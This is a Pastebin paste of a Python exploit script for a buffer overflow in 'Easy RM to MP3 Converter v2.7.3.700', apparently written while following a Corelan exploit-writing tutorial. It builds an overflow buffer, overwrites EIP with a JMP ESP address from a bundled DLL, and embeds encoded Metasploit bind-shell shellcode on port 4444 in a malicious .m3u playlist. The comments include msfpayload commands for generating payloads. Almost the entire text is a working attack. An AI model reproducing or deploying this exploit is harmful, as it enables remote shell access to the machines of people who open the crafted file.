Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # need the struct-libs for little-endian packing
- import struct
- # some fancy ascii-stuff (as adviced in corelans tutorial ;P)
- print """ ______ ____
- / /__ ___ ____ / /___
- __ ____/ // / _\______\_ \ / // /_
- __\ \\ .____// \_____ / \/ // //
- o/ 0\____ \/ \ / \__ /\ /0 /o
- _//__//_______/____Y_____\ / /___/\ \\__\\_
- <<<-Holy.Church.of.0xF00000000/___/--S3M73X\__\\2006-->>>"""
- print "\n -= Win32-Buffer-Overflow-Exploit for 'Easy RM to MP3 Converter v2.7.3.700' =-"
- print "\n corelan tutorial part1 - smtx.2010"
- print " greets 2 back-track-community and CORELAN"
- # building the buffer 26059 bytes till eip (depends on the path where the m3u is stored)
- preeip = 'PWN' + '5M7X' * ((25000 + 1056)/4) # pre buffer to reach saved EIP
- # overwrite saved EIP with a JMP-ESP
- # Address=01D0F23A
- # Message=Found JMP ESP at 0x1D0F23A (C:\Programme\Easy RM to MP3 Converter\MSRMCcodec02.dll)
- eip = struct.pack('<i', 0x1D0F23A) # eip
- # this is to stuff another 4 bytes because of the "calling"-conventions mentioned
- # here -> http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1
- # and there -> http://en.wikipedia.org/wiki/X86_calling_conventions
- # there are 4 bytes between ESP and our shellcode so we need this to make
- # ESP pointing onto your shellcode
- pad = 'FUCK'
- # i make a little nopsled just to be sure of "weird" stuff to happen
- nopsled = '\x90' * 10
- # BADCAHRS: \x09 = TAB, \x0a = LINEFEED, \x00 = STRING-TERMINATOR
- # size for shellcode is 3937 (not tested) at least enough for what we want
- # testing calc: ./msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
- # this is a bind-shell-code listening on TCP-Port:4444
- # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
- shcode = (
- "\xda\xc4\xd9\x74\x24\xf4\xbf\x99\xd0\x0e\xf5\x5e\x29\xc9\xb1"
- "\x56\x31\x7e\x19\x03\x7e\x19\x83\xee\xfc\x7b\x25\xf2\x1d\xf2"
- "\xc6\x0b\xde\x64\x4e\xee\xef\xb6\x34\x7a\x5d\x06\x3e\x2e\x6e"
- "\xed\x12\xdb\xe5\x83\xba\xec\x4e\x29\x9d\xc3\x4f\x9c\x21\x8f"
- "\x8c\xbf\xdd\xd2\xc0\x1f\xdf\x1c\x15\x5e\x18\x40\xd6\x32\xf1"
- "\x0e\x45\xa2\x76\x52\x56\xc3\x58\xd8\xe6\xbb\xdd\x1f\x92\x71"
- "\xdf\x4f\x0b\x0e\x97\x77\x27\x48\x08\x89\xe4\x8b\x74\xc0\x81"
- "\x7f\x0e\xd3\x43\x4e\xef\xe5\xab\x1c\xce\xc9\x21\x5d\x16\xed"
- "\xd9\x28\x6c\x0d\x67\x2a\xb7\x6f\xb3\xbf\x2a\xd7\x30\x67\x8f"
- "\xe9\x95\xf1\x44\xe5\x52\x76\x02\xea\x65\x5b\x38\x16\xed\x5a"
- "\xef\x9e\xb5\x78\x2b\xfa\x6e\xe1\x6a\xa6\xc1\x1e\x6c\x0e\xbd"
- "\xba\xe6\xbd\xaa\xbc\xa4\xa9\x1f\xf2\x56\x2a\x08\x85\x25\x18"
- "\x97\x3d\xa2\x10\x50\x9b\x35\x56\x4b\x5b\xa9\xa9\x74\x9b\xe3"
- "\x6d\x20\xcb\x9b\x44\x49\x80\x5b\x68\x9c\x06\x0c\xc6\x4f\xe6"
- "\xfc\xa6\x3f\x8e\x16\x29\x1f\xae\x18\xe3\x16\xe9\xd6\xd7\x7a"
- "\x9d\x1a\xe8\x6d\x01\x92\x0e\xe7\xa9\xf2\x99\x90\x0b\x21\x12"
- "\x06\x74\x03\x0e\x9f\xe2\x1b\x58\x27\x0d\x9c\x4e\x0b\xa2\x34"
- "\x19\xd8\xa8\x80\x38\xdf\xe5\xa0\x33\xe7\x6d\x3a\x2a\xa5\x0c"
- "\x3b\x67\x5d\xad\xae\xec\x9e\xb8\xd2\xba\xc9\xed\x25\xb3\x9c"
- "\x03\x1f\x6d\x83\xde\xf9\x56\x07\x04\x3a\x58\x89\xc9\x06\x7e"
- "\x99\x17\x86\x3a\xcd\xc7\xd1\x94\xbb\xa1\x8b\x56\x12\x7b\x67"
- "\x31\xf2\xfa\x4b\x82\x84\x03\x86\x74\x68\xb5\x7f\xc1\x96\x79"
- "\xe8\xc5\xef\x64\x88\x2a\x3a\x2d\xb8\x60\x67\x07\x51\x2d\xfd"
- "\x1a\x3c\xce\x2b\x58\x39\x4d\xde\x20\xbe\x4d\xab\x25\xfa\xc9"
- "\x47\x57\x93\xbf\x67\xc4\x94\x95\x62"
- )
- trigger = '\x90' * ( 3937 - len(shcode) - len(nopsled) - len(pad) )
- # lets put the attack-buffer together
- buffer = (preeip + eip + pad + nopsled + shcode + trigger)
- # open and write evil buffer into m3u-playlist
- print "\n - writing " + str(len(buffer)) + " bytes into m3u-playlist"
- f = open('pwn_easyRM.m3u', 'w')
- f.write(buffer)
- f.close()
- print " [x] done\n"
- # eof
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement